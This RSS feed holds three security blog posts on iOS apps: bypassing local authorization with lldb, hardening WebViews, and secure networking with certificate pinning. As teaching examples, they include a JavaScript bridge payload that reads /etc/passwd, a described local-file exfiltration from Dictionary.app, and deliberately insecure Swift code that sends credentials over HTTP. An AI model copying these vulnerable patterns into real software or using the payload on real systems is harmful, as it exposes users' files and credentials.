<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Wojciech Reguła on Medium]]></title>
        <description><![CDATA[Stories by Wojciech Reguła on Medium]]></description>
        <link>https://medium.com/@wojciechregula?source=rss-4698055bdb3------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*gj0SUHU432UCBzgwPeZ5DQ.png</url>
            <title>Stories by Wojciech Reguła on Medium</title>
            <link>https://medium.com/@wojciechregula?source=rss-4698055bdb3------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Sun, 10 May 2026 23:38:13 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@wojciechregula/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Vulnerabilities and Threats in Local Authorization on iOS Devices — Securing]]></title>
            <link>https://medium.com/securing/vulnerabilities-and-threats-in-local-authorization-on-ios-devices-securing-60e30d399329?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/60e30d399329</guid>
            <category><![CDATA[apple]]></category>
            <category><![CDATA[itsec]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[it-security]]></category>
            <category><![CDATA[ios]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Wed, 12 Jan 2022 12:05:32 GMT</pubDate>
            <atom:updated>2022-03-08T08:30:39.911Z</atom:updated>
            <content:encoded><![CDATA[<h3>Vulnerabilities and Threats in Local Authorization on iOS Devices — Securing</h3><p>We present potential threats of performing local authorization on iOS. You will learn how to protect your resources against unauthorized access.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dYXRIZVjkrA9KrBeJWNbFA.png" /></figure><h3>TL;DR</h3><ul><li>All checks done on the device can be bypassed</li><li>Move access control logic to the server</li><li>If you support in-app purchases, always verify receipts server-side</li></ul><h3>Context</h3><p>As the “mobile-first” slogan became reality, the market moved crucial functionality into mobile applications. It is natural that complicated applications restrict access to information, data or features. This article shows three patterns that I commonly observe during iOS app pentests. They are all caused by overtrusting the device and client-side checks. As devices shouldn’t be trusted, developers have to keep in mind that any client-side check can be bypassed.</p><h3>Vulnerability 1: Managing users — Cross-role access control on iOS</h3><p>The first common vulnerable pattern is improper verification of whether the currently logged-in user has the proper role to perform a certain action. Consider the following scenario:</p><ol><li>After the first startup, the user logs in.</li><li>The backend returns an OAuth token containing the role</li><li>The application verifies the token by checking the signature</li><li>If the validation succeeds, the app saves the user’s role in the user defaults</li><li>Based on that role, the application grants access to the proper views</li></ol><p>The problem starts when the server doesn’t verify if the user should even have access to that view. The user sends an HTTP request without having an appropriate role. 
Since the server accepts that request, the attacker performs an action they shouldn’t have access to.</p><p>Proof of concept:</p><p>The analyzed application saves the role in the user defaults, as observed using Passionfruit:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*JHxBWJA_SA-dsmQn.png" /></figure><p>The attacker attached lldb and overwrote the role value:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*me1ZXlUjA4pF3fwC.png" /></figure><p>Now Passionfruit shows:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*Hnv9yBJA_J_HVcsY.png" /></figure><h3>Vulnerability 2: Locked features</h3><p>Another example of a bad pattern is restricting access to features or resources that are already on the device. Once, during a pentest, I analyzed a video streaming application that restricted access to videos. If the user had bought access to a movie, they could open it. I investigated how the validation mechanism worked. As it turned out, the videos were downloaded to the device and only then was the access validation performed. Let’s consider the following Swift code:</p><pre>static func hasPremium() -&gt; Bool {<br>    if someLogic() {<br>        return true<br>    }<br>    return false<br>}</pre><p>The code contains a function checking if the user has a premium account. It returns a boolean accordingly. 
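Since any such local check can be bypassed, a more robust pattern is to let the backend answer the question instead. Below is a minimal sketch (not the pentested app’s code — the endpoint URL, token header, and JSON shape are my assumptions) in which the client merely relays the server’s decision:

```swift
import Foundation
#if canImport(FoundationNetworking)
import FoundationNetworking  // URLSession lives here on non-Apple platforms
#endif

// Hypothetical response shape returned by the backend.
struct EntitlementResponse: Decodable {
    let premium: Bool
}

// Pure decoding step: anything unparseable means "no premium".
func decodeEntitlement(_ data: Data) -> Bool {
    return (try? JSONDecoder().decode(EntitlementResponse.self, from: data))?.premium ?? false
}

// The device only asks; the server remains the single source of truth,
// so patching this check with lldb does not unlock server-held content.
func checkPremium(sessionToken: String,
                  completion: @escaping (Bool) -> Void) {
    var request = URLRequest(url: URL(string: "https://example.com/api/entitlements")!)
    request.setValue("Bearer \(sessionToken)", forHTTPHeaderField: "Authorization")
    URLSession.shared.dataTask(with: request) { data, _, _ in
        completion(data.map(decodeEntitlement) ?? false)
    }.resume()
}
```

Of course, an attacker can still flip the boolean on the device; the point is that the premium resources themselves must only ever be served by the backend after it re-checks the entitlement.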
The easiest way to bypass that logic is to attach lldb and change the returned value.</p><p>So, let’s set a breakpoint on the <em>hasPremium</em> function.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*cgSE_d1gB2qFXWUd.png" /></figure><p>Continue the execution of the application.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*JXUkHU2DtgQ_e6MV.png" /></figure><p>Then go right after the function and change the value of the <em>x0</em> register.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*gELXH1bz1PjUVyJT.png" /></figure><p>As you can see in the screenshot below, we were able to change the code execution flow and modify the returned value. Note that we did this in an application written in Swift. I have heard many times from developers that Swift is not Objective-C and cannot be easily manipulated. We’ve just shown otherwise.</p><h3>Threats in in-app purchases on iOS</h3><p>Purchases that users make in the application are the most obvious way to monetize an application. Abusing the purchases in your application may directly harm your business, so I decided to write a subsection especially for that problem. Implementing a secure application with purchases has to start during the architecture design process. If you implement your application incorrectly, it may lead to the bugs described in the previous subsections. You may ask: “how many clients will be security experts able to attach a debugger and modify the code execution flow?”. Probably not many. However, in most cases, the potential attackers don’t have to be security experts or even developers. There are universal tweaks available that every script kiddie can install. Take a look at <a href="https://techinformerz.com/localiapstore/">https://techinformerz.com/localiapstore/</a>. Another scenario is that a “security expert” will patch your application and publish it in a jailbreak store. 
So, again, any script kiddie will be able to get your application with all the premium content.</p><p>In the screenshot below you can see the transaction process using Apple’s standard StoreKit API.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*tMSnvWb8plWiTnEN.png" /></figure><p>The user taps the buy button, the App Store alert is displayed, the user pays for the product and Apple sends you a receipt. It’s now up to you to validate the receipt and grant access to the bought resources. According to Apple’s <a href="https://developer.apple.com/videos/play/wwdc2018/704/">documentation</a>, the receipt contains purchase information, certificates and a signature. As you can probably guess, if you do the receipt validation locally in your application, you have already lost the battle. The only way to do it securely is to move the access logic to your server! So, the algorithm should be:</p><ol><li>The user buys a product</li><li>Apple’s receipt is delivered to the user’s device</li><li>The user’s device sends the receipt to your server along with the session identifier (you have to know who sent the receipt)</li><li>The server sends the receipt to Apple using this <a href="https://developer.apple.com/documentation/appstorereceipts">API</a>.</li></ol><p>Now your server knows whether the user bought the product. The server should decide whether access should be granted. Please remember that the attacker may tamper with the HTTP responses that the server sends to your application. Make sure you have designed the application architecture well.</p><h3>Summary</h3><p>The purpose of this article was to warn you about the potential threats of performing local authorization. 
If you are interested in other aspects of mobile application security, we highly recommend our <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">Guidelines on mobile application security — iOS edition</a>.</p><p>As you saw in this article, attackers can modify everything that is stored on their devices. Most of the protections can be bypassed even by an inexperienced person with only basic reverse engineering knowledge. If your business is to sell premium content via an application, make sure you do that correctly. As abusing it usually requires nothing more sophisticated than installing one simple tweak, even script kiddies can harm your business. The conclusion is very straightforward: keep as much authorization logic as possible on your server.</p><p>If you have any questions about this article, feel free to <a href="https://www.securing.pl/en/contact">contact us</a>.</p><p><em>Originally published at </em><a href="https://www.securing.pl/pl/vulnerabilities-and-threats-in-local-authorization-on-ios-devices/"><em>https://www.securing.pl</em></a><em> on January 12, 2022.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=60e30d399329" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/vulnerabilities-and-threats-in-local-authorization-on-ios-devices-securing-60e30d399329">Vulnerabilities and Threats in Local Authorization on iOS Devices — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Secure implementation of WebView in iOS applications — Securing]]></title>
            <link>https://medium.com/securing/secure-implementation-of-webview-in-ios-applications-securing-799c0aa8d5?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/799c0aa8d5</guid>
            <category><![CDATA[itsec]]></category>
            <category><![CDATA[apple]]></category>
            <category><![CDATA[app-security]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Thu, 07 Oct 2021 09:32:24 GMT</pubDate>
            <atom:updated>2021-11-08T11:28:18.364Z</atom:updated>
            <content:encoded><![CDATA[<h3>Secure implementation of WebView in iOS applications — Securing</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MmKqaHkhQznZGH6StLUrMA.jpeg" /></figure><h3>TL;DR</h3><ul><li>Do not use UIWebView.</li><li>Make sure your Info.plist doesn’t contain App Transport Security exceptions.</li><li>Follow the least privilege principle.</li><li>Consider disabling JavaScript.</li><li>Code JavaScript-ObjC/Swift bridges carefully.</li><li>Follow good mobile application development practices -&gt; see our <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">Guidelines on mobile application security — iOS edition</a>.</li></ul><h3>Context</h3><p>Recently I had a chance to observe a lot of new WebView applications, so I decided to create this article. A few years ago, if someone wanted to create a multiplatform application, it was almost necessary to maintain a different codebase for each platform. Then cross-platform frameworks entered the market and made universal coding easier. One way of universal coding is to use WebView. The idea was simple: create an application in web technologies (HTML, CSS, JS) and render it within the native application. So, WebView is just an embedded browser in your application. This technology introduced vulnerabilities characteristic of web applications into native applications. Since a WebView can be treated as a browser, it uses the same mechanisms, which can be abused as well. As it turned out, the exploitation results can be even more harmful. What if the application wants to obtain resources saved on your device, like photos or contacts? Well, developers need to create JavaScript&lt;-&gt;Objective-C/Swift bridges that can be exploited using a simple Cross-Site Scripting vulnerability. 
In the next subsection, I will show you how to create secure WebView applications, covering the most common threats.</p><h3>Deprecated UIWebView — major security flaw</h3><p>This subsection could be shortened to “do not use UIWebView”. UIWebView is Apple’s old API, present in iOS since version 2.0, so since 2008. If you follow the history of vulnerabilities, you probably know that in 2008 most of the modern browser security features had not yet been invented. Do not expect an API released in 2008 to implement those security mechanisms either. UIWebView was deprecated in iOS 12.0 and should no longer be used in your code. If your application still uses UIWebView, the best recommendation I can give you is to rewrite it to WKWebView. Before you start the refactoring, I’d suggest reading the next subsection about WKWebView, as its implementation can be coded insecurely too.</p><p>But why do I not recommend using UIWebView? If you need concrete arguments, you can find them below:</p><ol><li>UIWebView doesn’t have functionality that allows disabling JavaScript. So if your application doesn’t use JS and you want to follow the least privilege principle, you cannot switch it off.</li><li>There is no feature handling mixed content. You cannot verify that everything was loaded over HTTPS. This shouldn’t matter in practice, because you shouldn’t add any App Transport Security exceptions (exceptions that allow insecure HTTP connections) in the first place.</li><li>UIWebView doesn’t implement out-of-process rendering as WKWebView does. So, if attackers find a memory corruption vulnerability in UIWebView, they will be able to exploit it in the context of your application.</li><li>File access via the<em> file://</em> scheme is always turned on. What’s even worse, accessing files via that scheme doesn’t follow the Same-Origin Policy mechanism. 
It means that if attackers exploit a Cross-Site Scripting vulnerability in your WebView, they can load files available in the application’s sandbox and then send them to their server.</li></ol><p>As a good example of UIWebView’s insecurity, I’ll show you a <a href="https://support.apple.com/lv-lv/HT209139">vulnerability</a> I found in Apple’s Dictionary.app on macOS:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*zu1Pc9K1wfexpQh2.png" /></figure><p>The Dictionary.app of course allows translation from language A to B. Apple wasn’t able to create all dictionaries, so you can create your own dictionary with, for example, an ethnic dialect. The translated words were then displayed in the UIWebView without any validation. I wondered if there was a possibility to exploit the <em>file://</em> handler and steal local files, so I created the following dictionary entry:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*A2baR9xXFHKLLIgA.png" /></figure><p>Then, I opened the Dictionary.app, launched netcat on 127.0.0.1:8000, and the contents of <em>/etc/passwd</em> were transferred:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*3nlIanodAmU_bzgC.png" /></figure><p>I think you are now convinced that using UIWebView is strongly discouraged.</p><h3>WKWebView on iOS devices</h3><p>WKWebView is the API you should use to load web content in your application. The “WK” prefix comes from WebKit, the browser engine. WKWebView is a modern API that applies all the modern web security mechanisms; it’s still maintained by Apple and receives updates. The good thing about WKWebView is that it does out-of-process rendering, so if attackers find a memory corruption vulnerability in it, your application’s process is still isolated.</p><p>Let’s start with the <em>Info.plist</em> configuration. In the article about secure networking on iOS, I wrote about App Transport Security exceptions. 
The recommendations also apply to WKWebView. Make sure you do not allow unencrypted HTTP connections. The WKWebView can be treated as a web browser, so if the attacker can perform a Man-In-The-Middle attack, they can steal your cookies/authorization tokens, execute JavaScript in your app’s context and thus, for example, call JavaScript&lt;-&gt;Objective-C/Swift bridges. You can verify that the content was loaded entirely over encrypted connections with the following code:</p><pre>import UIKit<br>import WebKit<br><br>class ViewController: UIViewController {<br>    @IBOutlet weak var webContentView: UIView!<br>    var configuration: WKWebViewConfiguration?<br>    var webView: WKWebView?<br><br>    func loadWebView() {<br>        self.configuration = WKWebViewConfiguration()<br>        self.webView = WKWebView(frame: self.webContentView.bounds, configuration: configuration!)<br>        self.webContentView.addSubview(self.webView!)<br>        let url = URL(string: &quot;https://securing.biz&quot;)!<br>        let request = URLRequest(url: url)<br>        self.webView!.load(request)<br>        print(&quot;Has only secure content?: \(self.webView!.hasOnlySecureContent)&quot;)<br>    }<br>}</pre><p>Then, you need to somehow load the HTML content. There are two approaches: the first loads HTML content from the application’s package (locally), and the second loads the HTML content from your website. Make sure you load content that you fully control. If you load JavaScript code from external resources, you can verify its cryptographic <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/script">hash</a> with the <em>integrity</em> attribute. For high-risk applications, it’s recommended to apply reverse engineering protections. In the WebView world, you can minify the JavaScript files or even obfuscate them.</p><p>Now, let’s talk about the hardening. 
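One hardening measure worth considering on top of the configuration above is a navigation allow-list: even if attackers inject a link or a redirect, the WebView refuses to leave origins you trust. This is a sketch under my own assumptions — the host list and the HTTPS-only rule are illustrative, not from the original article:

```swift
import Foundation

// Illustrative allow-list; replace with the origins your app actually needs.
let allowedHosts: Set<String> = ["securing.biz", "www.securing.biz"]

// Pure policy check: only HTTPS URLs on known hosts may be loaded.
func isAllowedNavigation(_ url: URL) -> Bool {
    guard url.scheme == "https", let host = url.host else { return false }
    return allowedHosts.contains(host)
}

// In a WKNavigationDelegate, this function would gate every request:
//
// func webView(_ webView: WKWebView,
//              decidePolicyFor navigationAction: WKNavigationAction,
//              decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
//     let allowed = navigationAction.request.url.map(isAllowedNavigation) ?? false
//     decisionHandler(allowed ? .allow : .cancel)
// }
```

Keeping the policy in a small pure function like this also makes it trivial to unit-test, which is rarely true of WebView code.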
The <em>file://</em> scheme is always enabled in WKWebView, but by default it cannot access files. That mechanism can be enabled, but please keep in mind the least privilege principle: if your WebView doesn’t necessarily have to access files, don’t turn it on.</p><p>The opposite is true for the JavaScript interpreter, which is turned on by default. If your website doesn’t use JS, it’s recommended (again, the least privilege principle) to turn it off. You can use the following code:</p><pre>let webPreferences = WKPreferences()<br>webPreferences.javaScriptEnabled = false<br>self.configuration?.preferences = webPreferences</pre><p>The last feature I wanted to discuss in this article is bridges. WKWebView allows calling native code from JavaScript. You probably now realize how harmful this could be if not properly coded. Two years ago I was pentesting an iOS application that used such bridges to get photos from the user’s photo library. As I found a stored Cross-Site Scripting vulnerability that allowed me to execute JavaScript code in every instance of that application, I was able to steal all the photos from users’ photo libraries and send them to my server. The native code is called via the postMessage API.</p><p>Native code:</p><pre>// first register the controller<br>self.configuration?.userContentController.add(self, name: &quot;SystemAPI&quot;)<br>[...]<br><br>// and expose native methods<br>extension ViewController: WKScriptMessageHandler {<br>    func userContentController(_ userContentController: WKUserContentController, didReceive message: WKScriptMessage) {<br>        if message.name == &quot;SystemAPI&quot; {<br>            guard let dictionary = message.body as? [String: AnyObject],<br>                  let command = dictionary[&quot;command&quot;] as? String,<br>                  let parameter = dictionary[&quot;parameter&quot;] as? String else {<br>                return<br>            }<br>            switch command {<br>            case &quot;loadFile&quot;:<br>                loadFile(path: parameter)<br>            case &quot;loadContact&quot;:<br>                loadContact(name: parameter)<br>            default:<br>                print(&quot;Command not recognized&quot;)<br>            }<br>        }<br>    }<br>}</pre><p>JavaScript code:</p><pre>&lt;script&gt;<br>window.webkit.messageHandlers.SystemAPI.postMessage({&quot;command&quot;:&quot;loadFile&quot;, &quot;parameter&quot;:&quot;/etc/passwd&quot;});<br>&lt;/script&gt;</pre><p>The code example I pasted is of course not well-designed, because it allows loading any file or any contact. When coding bridges, make sure your methods are as limited as possible, so that even if attackers somehow inject code into your WebView, the attack surface stays tight. Do not expose excessive methods, strictly validate the parameters and keep them limited (in this case, instead of loading a file from an arbitrary path, you could load files by ID from a directory specified in the function). To additionally prevent Cross-Site Scripting vulnerabilities, consider implementing the Content Security Policy mechanism. Although it’s only an additional layer of security, it can stop attackers by blocking XSS payloads.</p><h3>Summary</h3><p>Using WebViews in native applications may speed up development, as the same HTML/CSS/JS code can be used across all the platforms the application supports. That technology is indeed convenient but comes with new risks. In this article, I wanted to show you two APIs present in Apple’s environment. The old one, UIWebView, is considered insecure and should no longer be used. WKWebView is the right API to implement WebViews. Unfortunately, even using the modern API may lead to vulnerabilities. Developers have to make sure that their code is not vulnerable to both web-related and native attacks. 
This article presented how to implement secure WebViews and how to limit the attack surface.</p><p>During the iOS application development process, it’s also critical to follow best practices. We’ve put together a handbook that compiles all of our iOS security knowledge in one place. You can access it by clicking the link below.</p><p>Feel free to reach out to me. You can find me on <a href="https://twitter.com/_r3ggi">Twitter</a> or <a href="https://www.linkedin.com/in/wojciech-regula/">LinkedIn</a>.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/secure-implementation-of-webview-in-ios-applications/"><em>https://www.securing.pl</em></a><em> on October 7, 2021.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=799c0aa8d5" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/secure-implementation-of-webview-in-ios-applications-securing-799c0aa8d5">Secure implementation of WebView in iOS applications — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Key aspects of secure networking on iOS — Securing]]></title>
            <link>https://medium.com/securing/key-aspects-of-secure-networking-on-ios-securing-f437e584a5d4?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/f437e584a5d4</guid>
            <category><![CDATA[ios-app-development]]></category>
            <category><![CDATA[application-security]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[ios]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Tue, 08 Jun 2021 11:25:48 GMT</pubDate>
            <atom:updated>2021-09-02T13:21:42.876Z</atom:updated>
            <content:encoded><![CDATA[<h3>Key aspects of secure networking on iOS — Securing</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ks4AquGOqw56AvhOprXIsw.jpeg" /></figure><h3>TL;DR</h3><ul><li>Stop using HTTP, use HTTPS.</li><li>App Transport Security exceptions shouldn’t be set in production environments.</li><li>If you use third-party networking libraries, verify the secure connection.</li><li>For high-risk applications, use certificate pinning.</li><li>Always follow good mobile application development practices -&gt; see our <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">Guidelines on mobile application security — iOS edition</a>.</li></ul><h3>Context</h3><p>Most applications on our mobile devices talk to a backend. Offline applications are rarely used, and even if there is no need to log in, there is usually at least a need for analytics. We wish this went without saying, because networking seems pretty obvious, but it’s not uncommon for apps to make insecure connections. During pentests, from time to time we observe applications that use plain-text HTTP communication to transmit users’ credentials. This article will show you from the very beginning how to implement secure networking on iOS and what should be avoided.</p><h3>Forbidden HTTP communication on iOS</h3><p>Using HTTP in your application means that all the data you send is unencrypted. In other words, any attacker in a privileged network position may retrieve the information your app has sent. It also means that if your app’s user connects to a public hotspot, anyone will be able to sniff that traffic. HTTP is simply outdated; do not use it. Starting from iOS 9, developers who want to use HTTP have to set a proper App Transport Security exception. You will read more on that later. 
As a proof of concept, we have created a simple Swift application.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*CpUOBMhOHbuvqhk_.png" /></figure><p>This application sends a supplied login and password to <a href="http://securing.biz/">http://securing.biz</a>. Let’s take a look at the code below:</p><pre>import Foundation<br><br>let url = URL(string: &quot;http://www.securing.biz&quot;)!<br><br>func performLogin(login: String, password: String) -&gt; Void {<br>    let session = URLSession.shared<br>    var request = URLRequest(url: url)<br>    request.httpMethod = &quot;POST&quot;<br>    let parameters = &quot;login=\(login)&amp;password=\(password)&quot;<br>    request.httpBody = parameters.data(using: .utf8)<br>    let task = session.dataTask(with: request, completionHandler: { data, response, error in<br>        if let receivedData = data {<br>            print(&quot;\(receivedData)&quot;)<br>        }<br>    })<br>    task.resume()<br>}</pre><p>It uses the standard URLSession.shared singleton and sends an HTTP request. As we mentioned earlier, this code will fail because we didn’t set the required exceptions. So, we opened the Info.plist file and added the following XML code:</p><pre>&lt;key&gt;NSAppTransportSecurity&lt;/key&gt;<br> &lt;dict&gt;<br>  &lt;key&gt;NSExceptionDomains&lt;/key&gt;<br>  &lt;dict&gt;<br>   &lt;key&gt;www.securing.biz&lt;/key&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;NSExceptionAllowsInsecureHTTPLoads&lt;/key&gt;<br>    &lt;true/&gt;<br>   &lt;/dict&gt;<br>  &lt;/dict&gt;<br>&lt;/dict&gt;</pre><p>The code is self-descriptive. It allows the app to initiate HTTP loads. You can read more about the exceptions in the <a href="https://developer.apple.com/documentation/bundleresources/information_property_list/nsapptransportsecurity">official docs</a>.</p><p>The Info.plist file is a good place to verify whether the application conforms to best practices. 
<strong>Before deploying your application to production, search for App Transport Security exceptions.</strong> Returning to the application, we compiled it and installed it on the device. In order to sniff the traffic, we had to be in a privileged network position. The easiest way to do this on macOS is to open a personal hotspot in the Sharing options. So we did, and connected the iPhone to our Wi-Fi. Then, we opened Wireshark and started sniffing the hotspot’s interface. After we supplied the login and password, we clicked the “Log in” button. In Wireshark, we observed the traffic.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/832/0*v5C1UaIPUBW5SCbG.png" /></figure><p>As you can see, the credentials were sniffed. Please keep that in mind and forget about HTTP in production applications.</p><h3>HTTPS communication — the correct way</h3><p>This protocol provides encrypted communication. There are some traps in server configuration, but we will not discuss them in this article. We will focus on iOS applications. Developers usually choose third-party networking libraries for HTTP communication. It is more convenient, but also creates new risks. AFNetworking, a popular library, allowed a Man-In-The-Middle attack in version 2.5.1 when the application didn’t use certificate pinning. <strong>So, when you decide to use external networking libraries, verify the networking attack scenarios to be sure you do not expose your customers to risk.</strong></p><p>As the intention of this article was to be practical, we will do networking with one of the most popular Swift libraries — Alamofire. 
If you have any questions about networking implementation using Apple’s standard API, feel free to contact SecuRing.</p><p>Let’s replace the previously introduced performLogin function with a new one:</p><pre>import Alamofire<br><br>func performLoginWithAlamofire(login: String, password: String) -&gt; Void {<br>    struct Parameters: Encodable {<br>        let login: String<br>        let password: String<br>    }<br>    let parameters = Parameters(login: login, password: password)<br>    AF.request(url, method: .post, parameters: parameters, encoder: URLEncodedFormParameterEncoder.default).response { response in<br>        print(&quot;ALAMOFIRE \(response)&quot;)<br>    }<br>}</pre><p>In the meantime, we opened Burp Suite, an HTTP(S) proxy, and modified the proxy settings on our iPhone to point to Burp’s IP and port. When we clicked the “Log in” button, nothing happened. However, Burp showed an error message:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*ZKFuz2CAIRNnJ7FH.png" /></figure><p>Now we confirmed that the application refused the connection to our proxy server, as the server was not able to provide a trusted SSL certificate for the securing.biz domain. But what if one of the Certificate Authorities gets compromised and the attacker is able to create such a trusted SSL certificate? Or what if the attacker somehow installed a trusted SSL certificate on the victim’s device? Here comes the “certificate pinning” technique to prevent such scenarios.</p><h3>Certificate Pinning on iOS devices</h3><p>Certificate pinning is a technique that protects against connecting to your domain using SSL certificates other than your own. The mechanism can be implemented in several ways. The most popular are: pinning the whole certificate, pinning the server’s public key, or pinning the cryptographic hash of the certificate. 
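If you prefer Apple’s standard URLSession API over a third-party library, whole-certificate pinning can be sketched with a URLSessionDelegate. This is a simplified sketch, not the article’s implementation: the pinned DER bytes would in practice be loaded from the app bundle, and production code should additionally evaluate the full trust chain:

```swift
import Foundation
#if canImport(FoundationNetworking)
import FoundationNetworking
#endif

// Pure comparison: the handshake is accepted only when the presented leaf
// certificate matches the copy shipped inside the app byte for byte.
func isPinned(serverCertificate: Data, pinnedCertificate: Data) -> Bool {
    return serverCertificate == pinnedCertificate
}

#if canImport(Security)
import Security

final class PinningDelegate: NSObject, URLSessionDelegate {
    let pinnedCertificate: Data  // e.g. loaded from a bundled "server.der"

    init(pinnedCertificate: Data) { self.pinnedCertificate = pinnedCertificate }

    func urlSession(_ session: URLSession,
                    didReceive challenge: URLAuthenticationChallenge,
                    completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Void) {
        guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
              let trust = challenge.protectionSpace.serverTrust,
              let serverCertificate = SecTrustGetCertificateAtIndex(trust, 0) else {
            return completionHandler(.cancelAuthenticationChallenge, nil)
        }
        let serverData = SecCertificateCopyData(serverCertificate) as Data
        if isPinned(serverCertificate: serverData, pinnedCertificate: pinnedCertificate) {
            completionHandler(.useCredential, URLCredential(trust: trust))
        } else {
            completionHandler(.cancelAuthenticationChallenge, nil)
        }
    }
}
#endif
```

A session created with this delegate will refuse any TLS connection whose leaf certificate differs from the pinned one. Note the trade-off: pinning the exact certificate means shipping an app update whenever the certificate rotates; pinning the public key avoids that.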
You can read more about certificate pinning in the <a href="https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning">OWASP documentation</a>.</p><p>The example below shows how we implemented certificate pinning in our sample application using Alamofire:</p><pre>import Alamofire

let url = URL(string: &quot;https://securing.biz&quot;)!

class NetworkManager {
    static let shared: NetworkManager = NetworkManager(url: url)
    let manager: Session

    init(url: URL) {
        let configuration: URLSessionConfiguration = URLSessionConfiguration.default
        let evaluators: [String: ServerTrustEvaluating] = [&quot;securing.biz&quot;: PinnedCertificatesTrustEvaluator()]
        let serverTrustManager: ServerTrustManager = ServerTrustManager(evaluators: evaluators)
        manager = Session(configuration: configuration, serverTrustManager: serverTrustManager)
    }
}

func performLoginWithAlamofireAndCertificatePinning(login: String, password: String) -&gt; Void {
    struct Parameters: Encodable {
        let login: String
        let password: String
    }
    let parameters = Parameters(login: login, password: password)
    NetworkManager.shared.manager.request(url,
                                          method: .post,
                                          parameters: parameters,
                                          encoder: URLEncodedFormParameterEncoder.default).response { response in
        print(&quot;ALAMOFIRE \(response)&quot;)
    }
}</pre><p>So, we implemented a NetworkManager singleton class that pins the whole SSL certificate, which we placed in the app’s resources (DER formatted). Alamofire will load that certificate automatically. Then, we created a shared Session object that is used to perform the HTTP connection.</p><p>We installed the application on the device. In order to verify if the certificate pinning works correctly, we also installed an SSL certificate and added it to the trusted CAs. 
After clicking the “Log in” button, Burp Suite again showed the error:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*ZfAnUsAQ5hm2042A.png" /></figure><p>That behavior proves that the pinning worked as expected. Our connection is now immune to an attacker who cannot present our pinned SSL certificate.</p><h3>Summary</h3><p>Secure networking awareness is growing year by year. More and more applications comply with best practices. However, we still sometimes observe applications that use unencrypted HTTP, even though Apple tries to prevent such insecure practices with the App Transport Security mechanism. As we showed in this article, unencrypted traffic can be harmful to users, so HTTP should no longer be used in production environments. Using HTTPS is the proper way; however, it also comes with the risk of trusting invalid certificates. We always recommend testing the basic SSL substitution scenarios to be sure that an application is well written. Some of you may also be interested in implementing the certificate pinning mechanism for high-risk applications. We hope the knowledge shared in this article will help you create secure iOS applications.</p><p>It is also important to adhere to best practices during the iOS application development process. We have prepared a guide that collects our iOS security experience in one place. You can access it below.</p><p>Also, feel free to reach out to me. 
